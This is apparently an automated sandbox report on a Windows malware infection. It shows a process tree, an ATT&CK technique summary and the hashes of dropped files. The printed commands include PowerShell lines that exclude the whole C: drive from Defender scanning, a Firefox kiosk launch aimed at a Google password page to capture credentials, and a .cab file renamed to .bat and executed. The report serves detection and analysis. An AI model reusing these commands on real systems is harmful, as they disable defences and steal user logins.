C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:1796
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:932 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1992 -prefsLen 27099 -prefMapHandle 1996 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {aa33ebf0-7657-4784-a86e-b2be6baf88bf} -parentPid 932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.932" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu6⤵PID:4920
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2416 -initialChannelId {c8db580d-ae05-4b40-893b-cc273ec93f8e} -parentPid 932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket6⤵PID:2732
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3876 -prefsLen 25164 -prefMapHandle 3880 -prefMapSize 270279 -jsInitHandle 3884 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3892 -initialChannelId {463bd256-9362-4c40-9365-ddde4a38e197} -parentPid 932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab6⤵
- Checks processor information in registry
PID:4240
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4036 -prefsLen 27276 -prefMapHandle 4040 -prefMapSize 270279 -ipcHandle 4124 -initialChannelId {745c3378-d237-4582-afaf-1473815bb770} -parentPid 932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.932" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd6⤵PID:5300
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3296 -prefsLen 34775 -prefMapHandle 2780 -prefMapSize 270279 -jsInitHandle 2956 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4632 -initialChannelId {422c3471-a33e-4f14-931d-2a77327aecb0} -parentPid 932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab6⤵PID:5340
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5188 -prefsLen 34905 -prefMapHandle 5192 -prefMapSize 270279 -ipcHandle 5204 -initialChannelId {7a7eb2e6-d771-4419-9d98-4302ff193c9f} -parentPid 932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility6⤵PID:6464
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5428 -prefsLen 32952 -prefMapHandle 5432 -prefMapSize 270279 -jsInitHandle 5436 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5444 -initialChannelId {2f772fdd-0e65-415b-8a92-401eb39d3511} -parentPid 932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab6⤵PID:6728
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5640 -prefsLen 32952 -prefMapHandle 5644 -prefMapSize 270279 -jsInitHandle 5648 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5472 -initialChannelId {8100d9c8-c93d-469a-b30d-7de82396855c} -parentPid 932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab6⤵PID:6740
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5804 -prefsLen 32952 -prefMapHandle 5808 -prefMapSize 270279 -jsInitHandle 5812 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5820 -initialChannelId {333890e9-a60a-4649-b943-8466336fbd62} -parentPid 932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab6⤵PID:6776
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10427890101\a81cd96533.exe"C:\Users\Admin\AppData\Local\Temp\10427890101\a81cd96533.exe"3⤵PID:7164
-
-
C:\Users\Admin\AppData\Local\Temp\10427900101\4WMUMmx.exe"C:\Users\Admin\AppData\Local\Temp\10427900101\4WMUMmx.exe"3⤵PID:6324
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:1648
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 14245⤵
- Program crash
PID:17236
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10427910101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10427910101\TbV75ZR.exe"3⤵PID:6240
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:5320
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:6332
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:2876
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 4885⤵
- Program crash
PID:16964
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10427920101\dojG16n.exe"C:\Users\Admin\AppData\Local\Temp\10427920101\dojG16n.exe"3⤵PID:17032
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:17064
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:17076
-
-
-
C:\Users\Admin\AppData\Local\Temp\10427930101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10427930101\7IIl2eE.exe"3⤵PID:12384
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat4⤵PID:12604
-
-
-
C:\Users\Admin\AppData\Local\Temp\10427940101\UZPt0hR.exe"C:\Users\Admin\AppData\Local\Temp\10427940101\UZPt0hR.exe"3⤵PID:6148
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'4⤵PID:18328
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'5⤵
- Command and Scripting Interpreter: PowerShell
PID:18492
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵PID:17328
-
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""5⤵PID:20356
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath C:\6⤵
- Command and Scripting Interpreter: PowerShell
PID:23912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\6⤵PID:23136
-
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""5⤵PID:20392
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10427960101\20273858a2.exe"C:\Users\Admin\AppData\Local\Temp\10427960101\20273858a2.exe"3⤵PID:18708
-
-
C:\Users\Admin\AppData\Local\Temp\10427990101\PJ7KEk9.exe"C:\Users\Admin\AppData\Local\Temp\10427990101\PJ7KEk9.exe"3⤵PID:22360
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:23616
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10428001121\izP7K34.cmd"3⤵PID:12124
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10428001121\izP7K34.cmd"4⤵PID:23200
-
-
-
C:\Users\Admin\AppData\Local\Temp\10428010101\e5c64e905f.exe"C:\Users\Admin\AppData\Local\Temp\10428010101\e5c64e905f.exe"3⤵PID:18008
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1432 -ip 14321⤵PID:3732
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3156
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exeC:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe1⤵
- Executes dropped EXE
PID:64
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:2632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:3784
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:3520
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:7020
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\cZ4GbG3r\kygn3IrghHrrRx5N.exe1⤵PID:5152
-
C:\Users\Admin\AppData\Local\Temp\cZ4GbG3r\kygn3IrghHrrRx5N.exeC:\Users\Admin\AppData\Local\Temp\cZ4GbG3r\kygn3IrghHrrRx5N.exe2⤵PID:6040
-
C:\Users\Admin\AppData\Local\Temp\1VHQTNqs\UmJJKKXOxnV1qFuV.exeC:\Users\Admin\AppData\Local\Temp\1VHQTNqs\UmJJKKXOxnV1qFuV.exe 60403⤵PID:1044
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 12324⤵
- Program crash
PID:18388
-
-
-
C:\Users\Admin\AppData\Local\Temp\cZ4GbG3r\D8Evwh4aZQkHnyZG.exeC:\Users\Admin\AppData\Local\Temp\cZ4GbG3r\D8Evwh4aZQkHnyZG.exe 60403⤵PID:21896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 21896 -s 5764⤵
- Program crash
PID:7196
-
-
-
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"1⤵PID:12176
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1372 -ip 13721⤵PID:12188
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2876 -ip 28761⤵PID:12208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1648 -ip 16481⤵PID:17196
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exeC:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe1⤵PID:12672
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵PID:12688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1044 -ip 10441⤵PID:18320
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:18316
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:12908
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 20384 -ip 203841⤵PID:7660
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 21896 -ip 218961⤵PID:20320
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Modify Authentication Process
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Modify Authentication Process
1Modify Registry
2Virtualization/Sandbox Evasion
2Credential Access
Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.9MB
MD57b545a4a0f8febad62cff17b5b8f326f
SHA181cbbd98a6282ff3ab0400e4f6b82ce549401873
SHA256585392ec23db6d24697c38aec92e87985a418587d55f6b8b4467d12423205e36
SHA5127a0d4e6fc018256cdbe063351d0c9ba8cbe891eb7dbe1da18cad84ad7b6a273d704842b35d8fa8c1eab4ea9f4c8bfaf0447b5a5a03128e50b55bbdeb85b7bee4
-
Filesize
251KB
MD558d3a0d574e37dc90b40603f0658abd2
SHA1bf5419ce7000113002b8112ace2a9ac35d0dc557
SHA256dcc05c3ac7ae22d601bcb7c97cfcda568f3041bd39b2fd8899282dfde83369a5
SHA512df61329a32e9261b01c5b7d95e0d9a3fb8cc36e5d90ede72bc16befe00fb32c221898a8346db9de07c0f5dcba57dcdbb09a22ca8b73223f989d33ec433c3a90a
-
Filesize
96KB
MD56066c07e98c96795ecd876aa92fe10f8
SHA1f73cbd7b307c53aaae38677d6513b1baa729ac9f
SHA25633a2357af8dc03cc22d2b7ce5c90abf25ac8b40223155a516f1a8df4acbf2a53
SHA5127d76207c1c6334aa98f79c325118adf03a5ba36b1e2412803fd3e654a9d3630c775f32a98855c46342eba00d4a8496a3ded3686e74beaac9c216beee37aa5cb7
-
Filesize
2.5MB
MD5bee9603b0659ec222790915baf8793f9
SHA1f62a981a0c35ab65692fe4a4e25da3fa918bee0d
SHA256a2895294d3ba0fa269b98c2c7e5959a7649d37da9de204ba3c9bb8b6adef5be9
SHA5127860f61932117fc7c13d43dc4d7fa6e9f5e88bb65c68d82e32cf87ca258f7538b1250dabce83d49088c5f1cae0d61ab2d3a506629e511446308e68b595310bfc
-
Filesize
162B
MD51b7c22a214949975556626d7217e9a39
SHA1d01c97e2944166ed23e47e4a62ff471ab8fa031f
SHA256340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87
SHA512ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5
-
Filesize
649B
MD5261aca86baade66942e6f9e5ec84ec9b
SHA171c12abd700ceb6c66d0539052e308bc68eae5fb
SHA2565a6a537311e0f97dd2cb6f9e23535f900b041ba1fafc540b3d37d412a216b981
SHA5123c9b665e7947157a9096fd97a06d3e1b51196d29452e646ac7bd5c5ff7037904f5d31c5857d848bc5ac7eeb761f53e8b4633565d193b626a5bdebe64b40e75cc
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
79KB
MD5b2e55a7104f64e263720eb9956253f7f
SHA1d60160f0b974a3e178cdfee2347a4ae7342d02ac
SHA2567df8bc6737439a0b87a366982866e155cbf5fd941e36f2e682ad636ff2177ffd
SHA51210d6896ab163cb031723419ba2c958d44c907a6b80ac01cadaee62e538e8fc507a4fba733bc074cfddbfd19dc832540bf43d206116e1eaba9c58197a28b86165
-
Filesize
2KB
MD5622bf737a997b9a257f15dc3b9ee9da5
SHA16beba023f9c081393b64de079969e948a47be8be
SHA256bcefb9a5dbc47579f8b52cc37fd7591a0e20f00f0a7867df0232088db90273d7
SHA512c1833c09ef0b3e643b8657874e8a99d7d154ac255c326d85fccba53aa57679e7dad93e61b3b8419937cb7ad936eab727c5edd6c4be6b988982c1d61505305e77
-
Filesize
280B
MD57b0736a36bad51260e5db322736df2e9
SHA130af14ed09d3f769230d67f51e0adb955833673e
SHA2560d2adfd06d505b9020c292d30597083d808bfd90ddc0fe173def5db96832a087
SHA512caabdc6a8601b93f3c082e6506b3c9efe2242b90e92e86306dc0bd4857d33343ba395325fabb21f5db562d3e3932f52f77de547f379072d0154efd5f1b1cdeb3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\b31ac5d5-f3c9-4706-bd69-fa1295cda083\index-dir\the-real-index
Filesize1KB
MD5374084dd2eb46cb62dae6cc0d1e04ff7
SHA1a3624e23e2a8d3ae831e551e791938ff6fc631b0
SHA2566a550d269a1941772524f5e279b7ec040ff19a9735deaeef88983862bd5270ad
SHA5124fc843b6b07858ad3bf79ce6eb7af82b61a5ef123b5267fb61d80533ae9f89c27b339d02bcf08a3338a1b5b5b53f9d8fb7902ca9bbba3cf7d2d22b9a64d6d6ad
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\b31ac5d5-f3c9-4706-bd69-fa1295cda083\index-dir\the-real-index~RFe584774.TMP
Filesize1KB
MD5b94ccde51495b58690bf8033b5f23954
SHA15cb3fe3fa7bb34089f7451eed103be7234b69c04
SHA2562cd975db63bf854b66a1df652fff272f2d88ccaa6938e04da340df5ace4d5a15
SHA512c74fe33e4c83bb3f0609a453c4ddb28552769ab15b2a4aa9813c1f9f0f38ec4b964ff28e6ad1e415979fcf21548ec879b60cfc05028bd5ea3e2007466cbd0b9a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\d2917f5d-d68c-498c-92d3-4c25332814b1.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
40KB
MD5c5a25423de01c352f6fe8b720cb2fcd9
SHA1631ab07435fc8f2d158cebf0d125d7484deb5b47
SHA2561e1e51c7810cae5d0f097f9454a282f1b7a24c6db2c4fed01f17195f752e4764
SHA512201a5cfa3c31fc2326b3b3b8f65b25f326dfa552ee4ce1ccf91c845ce15f76001daca1f3e7b2b87ec38b2bae2afcdac90f06468be128b0dd083a691392758016
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
3.0MB
MD591f372706c6f741476ee0dac49693596
SHA18e8973d35d3de0ade6cc8e44cd21f2cffbdfe83d
SHA2569a401dded25b4bafd24225449ed48468787290bbb308dc5e40511da2858bb781
SHA51288b26c1c49bc2a77dbdcea0e22c33555932498b3a4cff66f6b08438c0d96a017367c14508249aa1ca2090ed0ca6081e28757fbda97f856675d9db9cc61f7b7ed
-
Filesize
53KB
MD5d4d8cef58818612769a698c291ca3b37
SHA154e0a6e0c08723157829cea009ec4fe30bea5c50
SHA25698fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6
-
Filesize
18KB
MD5d9b945c3c9c7d081da75c13adddc5cb4
SHA1ec0a7c402d6b1a32588cef97e1e6a089cf21e7ef
SHA256de94cd0ef7cefa77abefac7d6bd0a50bcbc71cef3c9cb53560a6fc56800c2ad9
SHA51209a512fe363389e32affcba54fc54fb083cbc05f9d14d04099ac5168fcea42f1b7243d299259eb1fb1fa94b5e9d0da06de76693701869b5043302065a7839f26
-
Filesize
944B
MD5bde1c782de166c67d570341214e9397f
SHA17d377ab775f8a02d0ec16f699ff2bfbf1e0d4936
SHA256af0fc430bd5bfca3f1d386c32f32b2e28768d30e6efc657cc016930747c9fd6e
SHA5128fa8f5aac6ebe5330aef6a55321aa8b5933b2859dc84c7f5eb73e17cb94b07013b0420319773c329a5fe5e1fff08a1613a026bea7da8d5abb7f0133b4ce25f60
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\activity-stream.discovery_stream.json.tmp
Filesize25KB
MD55717e16a6d738626fbedbd0a646ec2c1
SHA15c013ea1305fa9eed76ec3a6074ba1533c950172
SHA25655743a94473540ef46f244fbd087e1bab4b46ab8167ea5347497d786a808a343
SHA5124f327ef5f60f78a3de4bbe6deeec03fdbc7515103d7ad30ee9c86a1e1424054a88779cdc44defed9dfd0dc20f4e1a77b903b6d387e957aaa79ef22105c66afd9
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\cache2\entries\A585344A45AF937E3AB7D706291A9A3ED8D581D9
Filesize13KB
MD57a6bfe1a659dac7f53a5b071630c8a3c
SHA14455b53bf354a51a3f368c410d2e00112e9f1ba2
SHA25690bbe9b2b537fd9719afd98e6f3db59691b56c8c432c0e212cd0b054d0bc3105
SHA512541a99c75bb8832bc4ebe965f58a9a60167f347921f4ff5951507ecc846cdb81a3df936f4849d5fcd6690e271406d42c3cc93d36877af55e3702d03c2573b90a
-
Filesize
1.7MB
MD54ff7b57bcc3cb7758ceb9054dceda582
SHA1db02588f39cbc3a198b54cad0027b84529812c24
SHA256a9180506bccc383d2fbd08b71cf8f24f36827bae1fae11fbb62e5c1dbf77cea6
SHA5126c82bc297e884da64a2d52049cf3460dbe1fc6c676c82e7f0d37e497d164eb2382d70c63e5338ce0235f059bde73f3f0fb14b7791d57bcd5855b826ba86066ef
-
Filesize
1.9MB
MD51c1602475ec7a0aa4e5450a11dd8870f
SHA1fcb574a067e4b40feea92b296234dc037fabb7aa
SHA256d522f1e3faa457f26102b3b10b2281863d5282d4c68151eb5bd89096b9d99a92
SHA5127fd0be5da736ef645fb906eb0aca28e212a2bc6778efb554bd3d6a4e58bce2b140e43e452e74a1f5444ea7e1939e59bdfa09f83ed435dfb465e706d32504ebd7
-
Filesize
7.6MB
MD5827f222de09e90bc7641849f8b7d83b4
SHA1ea8bdd65b0f6ec8fad25370e5c70f89dba9be458
SHA256c85c00c182942ee59a81ddc47b5fa1235ad2b9dd7330e9ed01b1fc5e3c931d06
SHA512e62346699da34e9bfb440a214e4b06c32e27f02faefee302e0ca29a3c391e7cbc68e7038363136111da21113e8126ac1dffa6e12161cd59cd0d51e6a862a515b
-
Filesize
1.3MB
MD509232161939bec92432fe5751b7cd092
SHA1b5da678663e7adfc4a85b096e94fa5d4ba0ccc20
SHA256f741a6cfbd22e05821557394ea54651c78882c16e1ce667ef0343957abe201a0
SHA512914f26d4f6917a1d8eb3f9a5b33f63671fe3586d54efff2043ca16186bf1fa7859246062262d1fd2dca7f8571260aa027d6cca42a7e4881aead8f29a7276f119
-
Filesize
4.5MB
MD5057d041e3fd119da9058fea5654726cb
SHA1307d2f33e547d3714e4b17ead0267a3c5420f335
SHA2562a84b3161b28d7ca963e5e7eae0a99b070487a2ce13c0b3323e10d9b254a1cd8
SHA512dd75cdd9f31a5f5dc861473ccf4f5572d091344449caed47bb22b8a93a5efec4c2e74911406eda5a86f4c53465e2bf6093ff615ebf0575e984e2d86693f34549
-
Filesize
1.9MB
MD516590e96cec0ac435e592faf020e4acc
SHA1d42c4ab0b94e6de0f3a29fe572e5477117560d49
SHA2560c6b85162fdbb62e82e6b02a09a519ef21d29fe88884d37464a692db04b4b2c3
SHA5126827cc42e226e7b7afe1744db85fa6b57f9436354a670351252842bec19b79390494373df6cf6c060530cc66f962d36ab0e1d18238335de3d0aa3f9dd58ae596
-
Filesize
1.9MB
MD597990e03c7f1a7757e63e9837de0cba7
SHA1250d0cdf0b73aa90742f1816131fb82720c43732
SHA2564afb18f881628067e66c23f07122e8f0c69783489e8a87ad71be8de8e4568323
SHA5122545ae70d8ec562396a65d3d7e3c0ed76e49d27a3186ddfb3707953349dd45cd6cea89b3bb36ad8222bf0b1083b7f643cf3cfa8fd3f8ac1e249b737322df9015
-
Filesize
1.4MB
MD52f0f5fb7efce1c965ff89e19a9625d60
SHA1622ff9fe44be78dc07f92160d1341abb8d251ca6
SHA256426b6e77a4d2e72edf8cd6177578a732ca05510b56cb58d938d6e25820dc2458
SHA512b8587d32e98693f08c9c3776ac4168204d76dd6db0d76c6afc815d6727d745f6137ae83fe85a7562517b37c320ddebc27167a9f3f14dacca33954dbe437dc920
-
Filesize
4.7MB
MD54f1b02a7415709b8ad6d2a80b5d00b82
SHA12933cddfb5eeb59d89c8111f4980ed746d98e701
SHA2567c9171232a27dd10f6ce562c4a74abdf28c5d034ff183c9d5dbac2a68c7dc6fe
SHA512820683f04a8b3a40de103cdb52eb24f3a295ff525ac06f4858a1368e3be449f3ffe19d50570ec6dfb92f1cdf4de83b9d4445e4db24df755c92b58dcfd5e77657
-
Filesize
327KB
MD5fda2e2ddccb519a2c1fb72dcaee2de6f
SHA1efd50828acc3e182aa283c5760278c0da1f428a6
SHA256cf70392e26ee7d6d24cb39499567052935664d37a1b49572f9d0b5f3f3189f57
SHA51228c79ed9a9d5db3920b7e942c66670eec02046fa3d751ad18e9b3597caab76645b194bfa18bb5925ecfb8d201a291a44ee427ef39632f673db39edc43111c3cf
-
Filesize
429KB
MD522892b8303fa56f4b584a04c09d508d8
SHA1e1d65daaf338663006014f7d86eea5aebf142134
SHA25687618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f
SHA512852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744
-
Filesize
4.4MB
MD59b1ecbd80d260febaf6aa9f884f989ed
SHA1d0b9533221b168decaa2d370c659f84ce4e8a0cf
SHA2566fa1674305273612ebe2f8cd4b20a3fba8dc330c49071382bd3468e102c25898
SHA51283d06f5396c948056246a96dc87ebff0b4bca32b154f5c8d97da5097fe664d3a3c290a336619f14a56395fc0a704dababb4e4e3c6b677d92029d6c2d19b2b528
-
Filesize
2.1MB
MD58b7a6718ca74360fe9f51999563d5bd4
SHA1bba0641bc9c1360d8df011c5ad99d648536fd2a2
SHA256bb27921192d981c37db53a0c53e5298d35b5bb219638c66eb1ee2d63ccd2096d
